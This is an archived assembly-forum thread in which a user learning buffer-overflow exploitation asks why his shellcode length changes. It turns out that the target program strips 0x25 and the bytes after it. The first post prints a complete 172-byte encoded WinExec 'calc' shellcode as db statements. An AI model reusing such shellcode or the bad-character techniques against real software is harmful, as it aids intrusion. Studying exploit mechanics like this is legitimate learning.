define byte problem

Index > Main > define byte problem

Author

Thread

Overflowz

Joined: 03 Sep 2010
Posts: 1046

Overflowz 02 Jun 2011, 21:23

Hello everyone! I have problem here.. First of all, I'm studying at stack/buffer overflows and writing exploits in asm as well. Now, my problem is when I'm doing something like this:

Code:

shellcode:
db 172 dup 0x41

and after attaching vulnerable application to debugger, I don't see any 0x41 instruction there.. BUT, when I'm using this shellcode:

Code:

;WinExec - calc 172 bytes
shellcode:
db 0x31, 0xc9, 0x83, 0xe9, 0xdb, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0xd8
db 0x22, 0x72, 0xe4, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0x24, 0xca, 0x34, 0xe4, 0xd8, 0x22, 0xf9, 0xa1
db 0xe4, 0xa9, 0x0e, 0xe1, 0xa0, 0x23, 0x9d, 0x6f, 0x97, 0x3a, 0xf9, 0xbb, 0xf8, 0x23, 0x99, 0x07
db 0xf6, 0x6b, 0xf9, 0xd0, 0x53, 0x23, 0x9c, 0xd5, 0x18, 0xbb, 0xde, 0x60, 0x18, 0x56, 0x75, 0x25
db 0x12, 0x2f, 0x73, 0x26, 0x33, 0xd6, 0x49, 0xb0, 0xfc, 0x26, 0x07, 0x07, 0x53, 0x7d, 0x56, 0xe5
db 0x33, 0x44, 0xf9, 0xe8, 0x93, 0xa9, 0x2d, 0xf8, 0xd9, 0xc9, 0xf9, 0xf8, 0x53, 0x23, 0x99, 0x6d
db 0x84, 0x06, 0x76, 0x27, 0xe9, 0xe2, 0x16, 0x6f, 0x98, 0x12, 0xf7, 0x24, 0xa0, 0x2d, 0xf9, 0xa4
db 0xd4, 0xa9, 0x02, 0xf8, 0x75, 0xa9, 0x1a, 0xec, 0x31, 0x29, 0x72, 0xe4, 0xd8, 0xa9, 0x32, 0xd0
db 0xdd, 0x5e, 0x72, 0xe4, 0xd8, 0xa9, 0x1a, 0xd8, 0x87, 0x13, 0x84, 0x84, 0x8e, 0xc9, 0x7f, 0x8c
db 0x28, 0xa8, 0x76, 0xbb, 0xb0, 0xba, 0x8c, 0x6e, 0xd6, 0x75, 0x8d, 0x03, 0x30, 0xcc, 0x8d, 0x1b
db 0x27, 0x41, 0x13, 0x88, 0xbb, 0x0c, 0x17, 0x9c, 0xbd, 0x22, 0x72, 0xe4

I see instructions and works fine!
Reason, why I'm posting it here is that I tried instead of

Code:

shellcode:
db 172 dup 0x41

I've done this and it worked like a charm!

Code:

shellcode:
db 170 dup 0x41

My question is, is there something wrong with db/dup macros ?
Thank you.

02 Jun 2011, 21:23

bitshifter

Joined: 04 Dec 2007
Posts: 796
Location: Massachusetts, USA

bitshifter 03 Jun 2011, 02:23

well using fasm listing tool we can see the output is correct (or at least as expected)

Code:

00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       db 172 dup 0x41
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41

03 Jun 2011, 02:23

Overflowz

Joined: 03 Sep 2010
Posts: 1046

Overflowz 03 Jun 2011, 07:52

bitshifter
Then it's programs problem ? I can't find any dfference.. only addresses there.
Here's pics.

Description:	shellcode, WinExec - calc 172 bytes
Filesize:	219.1 KB
Viewed:	3348 Time(s)

Description:	0x41 with dups; 172 bytes
Filesize:	211.79 KB
Viewed:	3348 Time(s)

03 Jun 2011, 07:52

Overflowz

Joined: 03 Sep 2010
Posts: 1046

Overflowz 03 Jun 2011, 09:56

I've counted sent and original shellcode's sizes.
sent - 170 bytes
original - 172 bytes
I guess 2 bytes were filtered by the program.. I'm right ?
EDIT:
Ha! I found! program filters 0x25 (% symbol) and another 2 next bytes with something..
Original:

Code:

db 0x25, 0x12, 0x2f

Become:

Code:

db 0x00

That's why it's missing 2 bytes ))
Thread closed now.

03 Jun 2011, 09:56

< Last Thread | Next Thread >

Forum Rules:

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum